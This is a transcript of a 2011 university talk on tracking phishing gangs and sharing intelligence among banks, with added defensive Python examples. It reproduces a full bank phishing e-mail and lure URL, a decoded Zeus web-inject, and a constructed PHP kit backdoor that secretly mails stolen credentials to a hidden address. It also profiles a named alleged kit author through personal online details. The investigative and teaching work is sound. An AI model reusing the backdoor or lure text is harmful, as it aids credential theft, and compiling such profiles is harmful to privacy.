grupo de trabajo anti-phising // anti phising working group

Phishing: a Case for Information Sharing Gary Warner Director of Research in Computer Forensics


DESCRIPTION

Presentation by Gary Warner, Director of Research in Computer Forensics, The University of Alabama at Birmingham. Summer Course CIGTR/URJC 2011.

TRANSCRIPT

Page 1: Grupo de Trabajo Anti-Phising // Anti Phising Working Group

Phishing: a Case for Information Sharing

Gary Warner, Director of Research in Computer Forensics

Page 2:

Some Phishing Numbers

Phishing: A Case for Information Sharing© The University of Alabama at Birmingham, 2011

New Phish   First Date Seen
616         2011-06-01
647         2011-06-02
429         2011-06-03
340         2011-06-04
377         2011-06-05
752         2011-06-06
681         2011-06-07
742         2011-06-08
569         2011-06-09
485         2011-06-10
271         2011-06-11
360         2011-06-12
674         2011-06-13

In the month of May 2011 the UAB Phishing Intelligence system gathered evidence on 16,351 distinct phishing sites imitating 218 different financial institutions or brands.

In 2011 we’ve seen 85,797 distinct phishing URLs imitating 373 different financial institutions or brands.

We believe that less than 1% of these cases of computer intrusion for purposes of financial and identity theft are investigated as a crime.

In other words, for 99% of these criminals, Crime Pays.

Page 3:

UAB Computer Forensics Research Laboratory

The goal of our research lab is to address this type of disparity in three ways:

#1 – training tomorrow’s cybercrime fighters
#2 – providing better tools to law enforcement and investigative support for complex crimes
#3 – educating the public about cyber threats and how to respond to them

Page 4:

Cybercrime Scholars


Since 2007 we have offered graduate students in Computer & Information Sciences or Justice Sciences a “Certificate in Digital Forensics”.

Since 2010, undergraduates choosing a major/minor in Computer Science and Criminal Justice could apply for the “Internet Identity Scholarship”. This year four students will have their full tuition paid from a pool of more than twenty applicants.

Beginning in 2011, we also offer a Masters in Computer Forensics & Security Management (MS-CFSM).

We strongly support the APWG “eCrime Researchers Summit” to encourage other academics to pursue cybercrime studies.

Page 5:

Cybercrime Research

Our 35-workstation lab is divided into three areas:
- Spam & Phishing Lab
- Malware & Forensics Lab
- Investigators Bullpen

The spam & phishing lab provides access to more than 500 million spam email messages in the UAB Spam Data Mine and to the UAB PhishIntel system. More than 200 investigators have accounts on PhishIntel today.

The malware & forensics lab supports local, federal, and international law enforcement on cases involving malware or complex data environments.


Page 6:

Big Computers for Big Evidence


This is a picture of the “Rushmore” cluster

16 Pentium cores on 14 servers = 224 processors dedicated to analyzing cybercrime data

Sharing investigative data with agencies such as:
- Alabama Bureau of Investigation
- FBI Cyber
- DHS’s ICE (Immigration and Customs)
- Drug Enforcement Agency’s “Pharm & Chem Internet Investigations” team
- Germany’s BKA (Bundeskriminalamt)
- Netherlands High Tech Crimes Unit
- UK’s Serious & Organised Crime Agency

Page 7:

UAB’s Phishing Process


From “Reeling in Big Phish with a Deep MD5 Net” by UAB’s Wardman, Warner, Turner & McCalley

Page 8:

Typical Phishing Site


Here’s a typical phishing site. This one is hosted on “violinocaffe.com”, a website that has been hacked by the phisher.

After hacking the server, the criminal uploads his “phishing kit” and unpacks it to create this website on that server.

Page 9:

Not all criminals are the same


Without additional data, you do not know which phishing site was created by a twelve-year-old as a prank and which are being run by million-dollar crime syndicates.

Page 10:

Patterns

[Chart: Victims Per Site (bar chart, y-axis 10 to 70)]

If we agree that some sites have more victims than others, how could we determine this?

How will this impact our behavior?

Page 11:

Patterns


Just because a site captured the most userids and passwords does not mean it is responsible for the greatest financial losses.

How could we tie losses to sites?

Page 12:

Patterns

– In that example, the criminal has created an unfortunate “signature” for himself.

– He sampled the real bank’s website during “Black History Month”.

– Only one criminal group was doing this. We used that information to justify a search.


Page 13:

Which Phishing Group is your priority?


Page 14:

UAB PhishIntel for BBVA


Page 15:

A live phish . . .


Page 16:

Asks for our password


Page 17:

Asks for our Security Questions


Page 18:

Then sends us to Real Bank site

In the BBVA Compass log files there will be a ‘referrer tag’ telling us that the customer who has just arrived at our website came from “mojaishrana.info”.

This will help us identify customers who may have become victims, and also measure the impact of this particular phish.
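As an added example (not part of the original presentation), the referrer check described above, run over constructed web-server access-log lines: it lists which client addresses arrived from a known phishing host and how many distinct customers each phish reached. The log lines, the second host name and the helper names are constructed for illustration.

```python
"""Added example (not the presentation's code): find customers who reached the
real bank site straight from a phishing page, using the Referer header."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined Log Format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Phishing hosts from a takedown/intel feed. mojaishrana.info is the host named
# on the slide; phish-example.invalid is a constructed placeholder.
KNOWN_PHISH_HOSTS = {"mojaishrana.info", "phish-example.invalid"}

# Constructed sample log: three arrivals referred by phishing pages, one direct
# visit, one referral from a search engine (the last host is mixed-case on purpose).
SAMPLE_LOG = """\
203.0.113.10 - - [14/Jun/2011:09:12:01 -0500] "GET /login/ HTTP/1.1" 200 5120 "http://mojaishrana.info/bbva/compass/index.php" "Mozilla/5.0"
203.0.113.10 - - [14/Jun/2011:09:12:09 -0500] "GET /accounts/summary HTTP/1.1" 200 8810 "https://www.bbvacompass.com/login/" "Mozilla/5.0"
198.51.100.7 - - [14/Jun/2011:09:15:44 -0500] "GET /login/ HTTP/1.1" 200 5120 "http://mojaishrana.info/bbva/compass/verify.php" "Mozilla/5.0"
198.51.100.9 - - [14/Jun/2011:09:20:02 -0500] "GET /login/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.33 - - [14/Jun/2011:09:25:31 -0500] "GET /login/ HTTP/1.1" 200 5120 "https://www.google.com/search?q=bbva+compass" "Mozilla/5.0"
192.0.2.44 - - [14/Jun/2011:10:01:11 -0500] "GET /login/ HTTP/1.1" 200 5120 "http://PHISH-EXAMPLE.invalid/x/" "Mozilla/5.0"
"""


def referer_host(referer: str) -> str:
    """Lower-cased hostname of a Referer value; '' for '-' or an unparsable value."""
    if not referer or referer == "-":
        return ""
    return (urlsplit(referer).hostname or "").lower()


def find_phish_referrals(log_text: str, phish_hosts=KNOWN_PHISH_HOSTS):
    """Map each known phishing host to the set of client IPs it sent to us.

    Each hit is a customer who was on the phishing page moments before landing
    on the real site: a candidate for a credential reset and a fraud watch.
    """
    victims = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in Combined Log Format; skip rather than guess
        host = referer_host(m.group("referer"))
        if host in phish_hosts:
            victims[host].add(m.group("ip"))
    return dict(victims)


def impact_report(log_text: str, phish_hosts=KNOWN_PHISH_HOSTS):
    """{phishing_host: distinct client count}, one way to size each phish's impact."""
    return {h: len(ips) for h, ips in find_phish_referrals(log_text, phish_hosts).items()}


if __name__ == "__main__":
    for host, ips in find_phish_referrals(SAMPLE_LOG).items():
        print(f"{host}: {len(ips)} distinct clients -> {sorted(ips)}")
```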


Page 19:

Seven Steps of a Phishing Investigation

• Spam Analysis
• Site Analysis
• Kit Analysis
• Phish Clustering
• Log Analysis
• Search Warrant Analysis
• Open Source Intelligence


UAB offers training to law enforcement and corporate investigators on the topic of phishing, based on our “Seven Steps of a Phishing Investigation” methodology.

We won’t go into deep detail here, as it’s intended as an all-day class. . . .

Page 20:

Automated Kit Extraction

– Here’s an example of how the email addresses found in kits are useful.

– Today we had two Bank of America phishing sites that both contained the same “drop email address” – the email account to which the stolen credentials are sent.


Page 21:

Sometimes we learn their email addresses

In this example:

[email protected]

[email protected]

[email protected]

[email protected]

All receive the stolen credentials by email.


Page 22:

UAB PhishIntel


In this example, [email protected] has been found in eight different Paypal phishing sites dating back to March 12th and ranging up to June 14th.

Page 23:

PhishIntel email report

The email report proves that this email address,

[email protected]

was also used on the websites:
Designhotelbarcelona.com
Mirorestobar.com.uy
Raioreformaseoye.com
Inequal.com
Poderciudadano.com.ar
Adonaimiami.com
Yamburara.com
Dustproductions.se

Three of those were BBVA phish, but six others were Santander phish.


Page 24:

1 phisher – 49 sites

• Using this technique, last week we discovered that a phisher using the emails [email protected] and [email protected] had successfully used 49 phishing sites from May 15 to June 28th.

• 4 Bank of America, 1 Egg Bank, 1 Halifax, 3 HSBC, 1 M&T, 5 Regions Bank, 2 Royal Bank of Canada, 6 Santander, 3 US Bank and 22 sites against the British Tax authority, Her Majesty’s Revenue Collection Service.
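An added example (not the presentation's or UAB's code) of the drop-address linking behind pages 20 to 24: sites whose kits share a drop e-mail are joined into one actor cluster with a disjoint-set forest, and the brands hit by each cluster are counted, which is the list of banks that would need to hear from each other. Site names, brands and addresses are constructed.

```python
"""Added example (not from the presentation): cluster phishing sites by the
drop e-mail addresses recovered from their kits."""
from collections import Counter, defaultdict

# Constructed kit-extraction records: (site, brand, drop addresses found in the kit).
KIT_RECORDS = [
    ("site-a.example", "Bank of America", {"drop1@example.invalid"}),
    ("site-b.example", "HSBC",            {"drop1@example.invalid", "drop2@example.invalid"}),
    ("site-c.example", "Santander",       {"drop2@example.invalid"}),
    ("site-d.example", "HMRC",            {"drop2@example.invalid"}),
    ("site-e.example", "Regions Bank",    {"other@example.invalid"}),
    ("site-f.example", "PayPal",          set()),  # kit not recovered: nothing to link on
]


class UnionFind:
    """Minimal disjoint-set forest with path halving."""
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_by_drop_email(records):
    """Return clusters (largest first); each is a dict with sites, a Counter of
    brands and the drop addresses that tie the sites together. A site with no
    recovered address stays a singleton rather than being guessed into a group."""
    uf = UnionFind()
    for site, _brand, drops in records:
        uf.find(site)                       # register even if it has no drops
        for addr in drops:
            uf.union(site, "mail:" + addr.lower())  # the address is a node too
    groups = defaultdict(lambda: {"sites": [], "brands": Counter(), "drops": set()})
    for site, brand, drops in records:
        g = groups[uf.find(site)]
        g["sites"].append(site)
        g["brands"][brand] += 1
        g["drops"] |= {d.lower() for d in drops}
    return sorted(groups.values(), key=lambda g: -len(g["sites"]))


def brands_sharing_actor(records, min_brands=2):
    """Brand lists for clusters that hit several brands: each of those brands
    is investigating the same actor without knowing the others are."""
    return [sorted(c["brands"]) for c in cluster_by_drop_email(records)
            if len(c["brands"]) >= min_brands]


if __name__ == "__main__":
    for c in cluster_by_drop_email(KIT_RECORDS):
        print(len(c["sites"]), "sites", dict(c["brands"]), sorted(c["drops"]))
```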


Page 25:

Information Sharing

• How would any of those banks know that another bank was investigating this criminal?


Page 26:

Turnkeyconcepts.com


Page 27:

The “Kit” for the phish


Page 28:

Hidden in each of his kits is a backdoor.


See the line that has “eval(base64_decode”?

When we base64-decode that blob of text, we find the hidden email address:

[email protected]

So, while today’s copy of this phishing kit sends its stolen credentials to [email protected], it secretly ALSO sends the stolen data to “f9ih.carlos”, which is an alias for “shady-flow”.

We’ve seen this 30 times so far this year.

Page 29:

Open Source Intelligence

– The kit reveals that its author was:

[email protected]

– shady-islam, on the Arabic-language hacker website “arhack.net”, also uses that email as his MSN chat handle according to his signature.

– Shady-islam signs all of his emails with an anti-Israeli statement about the Jewish oppressors killing apostles and prophets and ending with:

– اللهم حرر المسلمين فى غزة يا ذا الجلال و العزة – “Oh God, Lord of Might and Glory, free the Muslims of Gaza”


Page 30:

Open Source Intelligence


Here’s Shady-Flow’s Facebook page, where he reveals that he has worked as a DJ at “FL Studio” in Casablanca, Morocco, since February 2007.

His high school must have been pretty interesting, as it was named “Hacking world.”

Page 31:

UAB Spam Data Mine

– Since we also have the UAB Spam Data Mine, we can search for a copy of the email that sent this phish:

select * from spam_link natural join spam where receiving_date = '2011-06-13' and machine = 'www.turnkeyconcepts.com';

iid.11Jun13.0645.5834 | www.turnkeyconcepts.com | /Testimonials_files/Bankofamerica.com/Boa/index.html | Bank Of America Alert: You have 1 new Security Message. | Bank Of America N/A | alert.security | bofa.com | 212.5.219.68/32 | 2011-06-13 | | Jun-13-2011 |


Page 32:

Copy of the email from the UAB Spam Data Mine

Security Precaution,

For optimal viewing of the Bank of America Web site, we recommend that you enable CSS.We at Bank Of America work hard to ensure the security of our clients, In carrying out our responsibility, We recently had cause to suspect that there has been attempts to log into your account, There were multiple password failures during the course of the illegal attempt to log into your account. Though the attempts were unsuccesful We need you to re-confirm your account information by filling in your precise and current account information. If this is not completed within the next 8hrs, we will be forced to suspend your account indefinitely.

To re-confirm, Please Sign on and verify your identity:

Sign On

Bank Of America helps you to plan your financial future. Thank you for helping us protect your account

Sincerely, Bankofamerica.com Security Advisor

===================

The words "Sign On" are a link to the phishing website: http://www.turnkeyconcepts.com/Testimonials_files/Bankofamerica.com/Boa/index.html


Page 33:

“Free” backdoored web kits


These “free” kits contain back doors that cause the users of the kits to actually also send all stolen credentials to the Kit Creators.

Collectively these are known as “Mister Brain Kits” after the most prevalent group doing these scams out of Morocco.

Page 34:

Chase kit “Action” file

The downloader of the kit is instructed that the only thing he has to do is update the “$send” variable in this action file with his own email address.

He misses the “include” statement at the top. The included file populates a new variable “$IP” with the kit author’s email address [email protected]

The “send array” at the bottom makes sure that BOTH emails get the stolen data.
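An added example, not from the presentation or from any kit, of the kit triage described on pages 28 and 34: it decodes each eval(base64_decode(...)) blob found in a recovered action file and reports the visible recipient next to the hidden ones, plus any include statements worth reading. The PHP text and every address in it are constructed; only the $send / $IP naming follows the slide.

```python
"""Added example (not the presentation's code): static triage of a phishing-kit
action file for hidden credential recipients."""
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.S)
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")

# The hidden half of a constructed backdoor: the author's address only
# appears after decoding, exactly the pattern the slide describes.
_HIDDEN_PHP = '$IP = "kitauthor@example.invalid";'
_BLOB = base64.b64encode(_HIDDEN_PHP.encode()).decode()

# Constructed action file in the shape described on the slide.
SAMPLE_ACTION_PHP = f"""<?php
include("inc/config.php");
eval(base64_decode('{_BLOB}'));
$send = "downloader@example.invalid";   // the only line the downloader is told to edit
$message = "captured form fields";
$recipients = array($send, $IP);        // the 'send array': BOTH addresses get the data
foreach ($recipients as $to) {{ mail($to, "result", $message); }}
?>"""


def decode_eval_blobs(php_source: str):
    """Decoded text of every eval(base64_decode('...')) in the file, in order.
    A malformed blob yields '' so positions still line up with the matches."""
    out = []
    for blob in EVAL_B64_RE.findall(php_source):
        try:
            raw = base64.b64decode("".join(blob.split()), validate=True)
            out.append(raw.decode("utf-8", "replace"))
        except ValueError:
            out.append("")
    return out


def triage_kit_file(php_source: str):
    """Where does the stolen data go? Visible recipients come from the plain
    source; hidden ones only from decoded eval payloads."""
    visible = set(EMAIL_RE.findall(php_source))
    hidden = set()
    for decoded in decode_eval_blobs(php_source):
        hidden |= set(EMAIL_RE.findall(decoded))
    return {
        "includes": INCLUDE_RE.findall(php_source),   # other files to read next
        "visible_recipients": sorted(visible),
        "hidden_recipients": sorted(hidden - visible),
        "has_eval_backdoor": EVAL_B64_RE.search(php_source) is not None,
    }


if __name__ == "__main__":
    print(triage_kit_file(SAMPLE_ACTION_PHP))
```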


Page 35:

A Mister Brain example


Page 36:

Some Success – but still a drop in the bucket


Recently Romanian authorities, working on tips developed with the FBI’s Internet Crime & Complaint Center, arrested 70 hackers.

The FBI’s Legal Attache to Romania says cyber criminals in that country steal “hundreds of millions of dollars each year” from North Americans.

Page 37:

Very Organized Crime: Operation Phish Phry


32 Indictments in an example of a US-based organized crime phishing group

Page 38:

Brand Impact varies widely (2011 to date numbers)

# of brands seen   # of sites seen
3                  5000+ sites
12                 1000-4999 sites
59                 100-999 sites
41                 25-99 sites
45                 10-24 sites
46                 5-9 sites
73                 2-4 sites
96                 1 site


Page 39:

Zeus

– Zeus is a “keylogging” botnet responsible for stealing many millions of userids and passwords last year.

– Zeus can also use infected computers for remote control.

– This means they can log in to your bank from your customer’s computer, using the correct userid, password, cookie file, browser, IP address and computer.


Page 40:

Zeus Arrests

– While some criminals who use Zeus were arrested last year in the USA, United Kingdom, and Ukraine, many people have the source code and many criminals are using this botnet software.

– To learn more about the Zeus arrests, read about “Operation Trident BreACH” from the FBI.


Page 41:

Zeus & Information Sharing

– In the same way that one criminal attacks many banks with phishing, one criminal also can attack many banks with malware.

– Zeus contains an encrypted “configuration file” that contains a list of URLs. If the user visits any of those URLs, special actions may occur.


Page 42:

Zeus Action Example

– Here is one we decoded last summer:

+++++++++++++++++++++++++++++++++++++++++++++++++
Target URL: https://www.bbvacompass.com/contact/
field 1: <head>
field 2: </body>
field 3: <title>Tresury Management wesite is currently unavailable</title></head><body><center><img src="https://e-access.compassbank.com/bbw/brandimage/Login1?t=4" alt=""><br>Due to system maintenance, online Treasury Management will be unavailable for 24 hours. Please try to access this page at a later point or if you have any questions contact our technical support at 1-858-633-0539.</center>
++++++++++++++++++++++++++++++++++++++++++++++++

– In this example, the displayed web page replaces the “Contact Us” link with a message saying to call a telephone number controlled by the criminal instead.


Page 43:

Zeus Action Example

In that configuration file, 176 different banking websites were found.

Unless they also decrypted the config file, none of those banks are aware that they are being targeted by the same criminal.
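An added example (not the presentation's own code) of turning a decoded Zeus configuration into the per-bank notification list this slide argues for: it parses entries in the layout shown on the previous slide (Target URL, field 1 to 3 between rows of plus signs), groups the targets by hostname, and pulls out any phone number an inject tells the customer to call. The three entries and their hosts are constructed.

```python
"""Added example (not from the presentation): parse decoded Zeus web-inject
entries and produce a per-host summary for sharing with the targeted banks."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SEP_RE = re.compile(r"^\++\s*$", re.M)                 # rows of '+' between entries
FIELD_RE = re.compile(r"^(Target URL|field [123]):\s*(.*)$", re.M)
PHONE_RE = re.compile(r"\b1-\d{3}-\d{3}-\d{4}\b")       # the 'call this number' lure
KEYS = {"Target URL": "target", "field 1": "before", "field 2": "after", "field 3": "inject"}

# Constructed decoded config text; hosts are placeholders, layout follows the slide.
SAMPLE_CONFIG = """\
++++++++++++++++++++++++
Target URL: https://www.bank-one.invalid/contact/
field 1: <head>
field 2: </body>
field 3: <title>Treasury Management website is currently unavailable</title></head><body><center>Please contact support at 1-555-010-0199.</center>
++++++++++++++++++++++++
Target URL: https://online.bank-two.invalid/login*
field 1: <head>
field 2: </body>
field 3: <p>Scheduled maintenance, please try again later.</p>
++++++++++++++++++++++++
Target URL: https://www.bank-one.invalid/wire/*
field 1: <head>
field 2: </body>
field 3: <p>Wire transfers are unavailable, call 1-555-010-0199.</p>
++++++++++++++++++++++++
"""


def parse_injects(config_text):
    """Split on the '+++' separators; each block becomes a dict with
    target/before/after/inject. Blocks without a Target URL are ignored."""
    entries = []
    for block in SEP_RE.split(config_text):
        fields = {KEYS[k]: v.strip() for k, v in FIELD_RE.findall(block)}
        if "target" in fields:
            entries.append(fields)
    return entries


def targets_by_host(entries):
    """Group entries by hostname, the unit at which a bank can be notified.
    Trailing '*' wildcards are stripped before parsing the URL."""
    by_host = defaultdict(list)
    for e in entries:
        host = urlsplit(e["target"].rstrip("*")).hostname or ""
        by_host[host.lower()].append(e)
    return dict(by_host)


def notification_report(config_text):
    """Per host: inject count, targeted paths, and phone numbers in the injects."""
    report = {}
    for host, entries in targets_by_host(parse_injects(config_text)).items():
        report[host] = {
            "injects": len(entries),
            "paths": sorted(urlsplit(e["target"].rstrip("*")).path for e in entries),
            "phone_numbers": sorted({p for e in entries for p in PHONE_RE.findall(e["inject"])}),
        }
    return report


if __name__ == "__main__":
    for host, info in notification_report(SAMPLE_CONFIG).items():
        print(host, info)
```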


Page 44:

APWG – the Anti-Phishing Working Group

That is one of the purposes of the Anti-Phishing Working Group. The APWG exists to help banks that are being victimized by cybercriminals share information.

In April, the APWG “Counter-eCrime Operations Summit” is for technical sharing between the members of the group who work on defending banks. In 2011 this meeting was in Malaysia. In 2010 it was in Sao Paulo, Brazil.

In November, the APWG General Meeting is held together with the “eCrime Researchers Summit”, a meeting where we encourage University scientists and researchers to work on problems to build better technology to fight cybercrime.


Page 45:

APWG – the Anti-Phishing Working Group

In addition to sharing between members, the APWG encourages the reporting of new phishing sites so they may be shared with all members.

We also work actively with Law Enforcement. I am the co-chair of the “Working with Law Enforcement” committee, and we look forward to working more closely with law enforcement around the world.


Page 46:

APWG – the Anti-Phishing Working Group

http://www.antiphishing.org/

For more details about meetings, and how to join.


Page 47:

Working with UAB

At UAB, we also work closely with many banks, and with law enforcement. We provide information for free to law enforcement. We encourage banks to support our research through sponsorship, or by becoming a partner in our Center for Information Assurance and Joint Forensics Research.


Page 48:

Working with UAB

UAB is also always looking for students. We offer a Masters degree in “Computer Forensics and Security Management”.

We are also always looking for Computer Science students to pursue our PhD or Masters Degree.

We do have a Spanish-speaking faculty member, Dr. Thamar Solorio, who would be happy to serve as point of contact for potential PhD students from Spain and other countries represented today. Thamar specializes in Natural Language Processing and Artificial Intelligence, and works very closely with the UAB Computer Forensics Research Laboratory.


Page 49:

We Want To Help

Gary Warner, Director of Research in Computer Forensics
A Research Partnership between The University of Alabama at Birmingham’s Department of Computer & Information Sciences & Department of Justice Sciences
[email protected]
+1.205.422.2113

For PhD student recruiting: Dr. Thamar Solorio, [email protected]

Website: www.cis.uab.edu/forensics/

Blog: garwarner.blogspot.com

Spam as Evidence© The University of Alabama at Birmingham, 2011 49